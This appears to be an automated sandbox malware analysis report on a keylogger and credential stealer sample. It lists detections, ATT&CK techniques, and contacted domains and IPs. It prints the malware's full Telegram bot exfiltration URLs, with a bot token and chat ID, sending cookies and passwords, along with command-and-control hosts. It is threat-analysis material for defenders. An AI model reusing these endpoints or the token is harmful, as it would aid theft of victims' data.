Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qggKEJlcsFa.exe PID: 8064, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 12.2.qggKEJlcsFa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3d1f790.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EUYIlr7uUX.exe.3cd9970.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: EUYIlr7uUX.exe PID: 7772, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qggKEJlcsFa.exe PID: 8064, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Scheduled Task/Job	31 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	11 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EUYIlr7uUX.exe	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
EUYIlr7uUX.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe	21%	ReversingLabs	ByteCode-MSIL.Trojan.Generic

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://varders.kozow.com:8081	0%	URL Reputation	safe
http://aborters.duckdns.org:8081	100%	URL Reputation	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?L	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/8.46.123.33$	0%	URL Reputation	safe
http://anotherarmy.dns.army:8081	100%	URL Reputation	malware
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	188.114.97.3	true	true	unknown
api.telegram.org	149.154.167.220	true	true	unknown
checkip.dyndns.com	132.226.8.169	true	false	unknown
smtp.hostinger.com	172.65.255.143	true	false	unknown
15.164.165.52.in-addr.arpa	unknown	unknown	true	unknown
checkip.dyndns.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Softwares%20%7C%20user%20%7C%20VIP%20Recovery	false		unknown
https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false		unknown
https://reallyfreegeoip.org/xml/8.46.123.33	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ATopSites%20%7C%20user%20%7C%20VIP%20Recovery	false		unknown
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2008:51:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown
https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0AInstalled%20Browsers%20%7C%20user%20%7C%20VIP%20Recovery	false		unknown
https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193226784&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2008/10/2024%20/%2010:10:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.office.com/	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/chrome_newtab	qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://smtp.hostinger.com	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ECC000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org	EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	true		unknown
https://www.office.com/lB	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot7207203688:AAH7zD-WPsi2BXK6KyZWdSEeTTm6Kjd9c5o/sendDocument?chat_id=1193	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://chrome.google.com/webstore?hl=en	EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://varders.kozow.com:8081	EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20a	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ac.ecosia.org/autocomplete?q=	EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?L	EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EB2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DAA000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002E28000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.office.com/p	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002F11000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002DEF000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D80000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	EUYIlr7uUX.exe, 00000000.00000002.1440364137.0000000002D2E000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 00000008.00000002.1472091436.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D31000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	EUYIlr7uUX.exe, 00000007.00000002.3899571109.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3898797731.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	EUYIlr7uUX.exe, 00000000.00000002.1440863669.0000000003CD9000.00000004.00000800.00020000.00000000.sdmp, EUYIlr7uUX.exe, 00000007.00000002.3891777327.0000000002A8F000.00000004.00000800.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3887971741.0000000000432000.00000040.00000400.00020000.00000000.sdmp, qggKEJlcsFa.exe, 0000000C.00000002.3891278217.0000000002D80000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
172.65.255.143	smtp.hostinger.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528437
Start date and time:	2024-10-07 22:40:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 26s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EUYIlr7uUX.exe renamed because original name is a hash value
Original Sample Name:	a3939099773cda5b2c94a6f1061ffa19.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@16/11@9/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 364 Number of non-executed functions: 29
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: EUYIlr7uUX.exe

Simulations

Behavior and APIs

Time	Type	Description
16:41:04	API Interceptor	7846779x Sleep call for process: EUYIlr7uUX.exe modified
16:41:06	API Interceptor	13x Sleep call for process: powershell.exe modified
16:41:07	API Interceptor	4278007x Sleep call for process: qggKEJlcsFa.exe modified
22:41:06	Task Scheduler	Run new task: qggKEJlcsFa path: C:\Users\user\AppData\Roaming\qggKEJlcsFa.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	checkip.dyndns.org/
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	checkip.dyndns.org/
	Confirmation transfer AGS # 03-10-24.scr.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	MT103-93850.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	StatementXofXaccount.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	TTXAPPLICATION.xls	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	KBGC_1200O000000_98756.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
188.114.97.3	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
	IRYzGMMbSw.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/yuvr/
	Arrival Notice.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	http://www.thegulfthermale.com.tr/antai/12/3dsec.php	Get hash	malicious	Unknown	Browse	www.thegulfthermale.com.tr/antai/12/3dsec.php
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/MlZtCPkK/download
	https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2	Get hash	malicious	HTMLPhisher	Browse	mairie-espondeilhan.com/
	QUOTATION_SEPQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/758bYd86/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/58PSl7si/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	8038.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
smtp.hostinger.com	Uw_bedrijfschauffeur_rijdt_zo_slecht.Mp4.exe	Get hash	malicious	AgentTesla	Browse	172.65.255.143
	purchase_order_100932239445.img	Get hash	malicious	AgentTesla	Browse	172.65.255.143
	SALock_Purchase_order_000192883923.img	Get hash	malicious	AgentTesla	Browse	172.65.255.143
	Remittance Advice (Purchase Order 100239443).img	Get hash	malicious	AgentTesla, zgRAT	Browse	172.65.255.143
	RFQ_00120399405039.pdf.img	Get hash	malicious	AgentTesla	Browse	172.65.255.143
api.telegram.org	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rREQUESTFORQUOTE-INQUIRY87278.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Yeni Sipari#U015f.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	COMPANY PROFILE_pdf.exe	Get hash	malicious	DarkTortilla, Snake Keylogger	Browse	149.154.167.220
	Pla#U0107anje,jpg.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	Justificante de pago.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	RFQ Ref. No CRCCRFQHAFJIHDG2-KSU001 REV.01..exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	z1PO7311145.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	PO.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
